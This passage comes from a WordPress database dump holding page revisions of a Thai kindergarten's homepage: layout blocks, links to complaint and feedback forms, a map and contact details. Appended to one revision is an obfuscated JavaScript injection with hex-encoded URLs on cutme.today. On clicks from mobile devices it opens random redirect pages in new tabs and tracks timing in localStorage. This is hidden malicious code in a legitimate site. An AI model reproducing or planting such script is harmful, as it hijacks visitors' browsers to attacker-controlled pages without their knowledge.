{\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 10:45:32','2024-09-24 03:45:32','',19,'http://watprato.ssk.in.th/?p=412',0,'revision','',0),
(414,2,'2024-09-24 10:52:15','2024-09-24 03:52:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div 